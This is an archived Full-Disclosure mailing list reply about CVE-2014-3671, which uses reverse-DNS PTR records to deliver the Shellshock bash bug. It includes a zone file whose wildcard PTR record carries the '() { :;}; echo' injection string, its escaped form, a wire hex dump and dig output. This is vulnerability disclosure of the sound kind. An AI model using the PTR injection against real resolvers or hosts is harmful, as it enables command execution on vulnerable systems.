lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 14 Oct 2014 15:45:34 +0100
From: Dirk-Willem van Gulik <dirkx@...weaving.org>
To: Florian Weimer <fw@...eb.enyo.de>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash
	vulnerability (CVE-2014-6271 et.al.)


On 14 Oct 2014, at 13:04, Florian Weimer <fw@...eb.enyo.de> wrote:

>> A simple zone file; such as:
>> 
>>     $TTL 10;
>>     $ORIGIN in-addr.arpa.
>>     @     IN SOA     ns.boem.wleiden.net dirkx.webweaving.org (
>>                    666        ; serial
>>                    360 180 3600 1800 ; very short lifespan.
>>                    )
>>     IN          NS     127.0.0.1
>>     *           PTR      "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 
> 
> I'm surprised DNS servers grok this, should be
> 
> * IN PTR \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS.
> 
> Or something similar.

The production versions of NSD accepts this fine ‘as is’ (FreeBSD-9.3); bind requires a bit of careful escaping.

On te wire one then sees the raw ‘binary’ — which can indeed be very raw:

000001d0  XX XX XX XX 31 28 29 20  7b 20 3a 3b 7d 3b 20 65        () { :;}; e|
000001e0  63 68 6f 20 63 76 65 2d  32 30 31 34 2d 36 32 37  |cho cve-2014-627|
000001f0  31 2c 20 63 76 65 2d 32  30 31 34 30 37 31 36 39  |1, cve-201407169|
00000200  2c 20 72 64 6e 73 c0 14  c0 XX XX XX XX XX XX XX  |, rdns

And once you push this through DIG - one sees:

	4.3.2.1.in-addr.arpa.	10	IN	PTR	\(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa.

depending on your escaping (which nornal unix libc/resolve does). And then we found at least one setenv() which would *de-escape* above nicely - getting the octal and decimal right.

Dw.


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists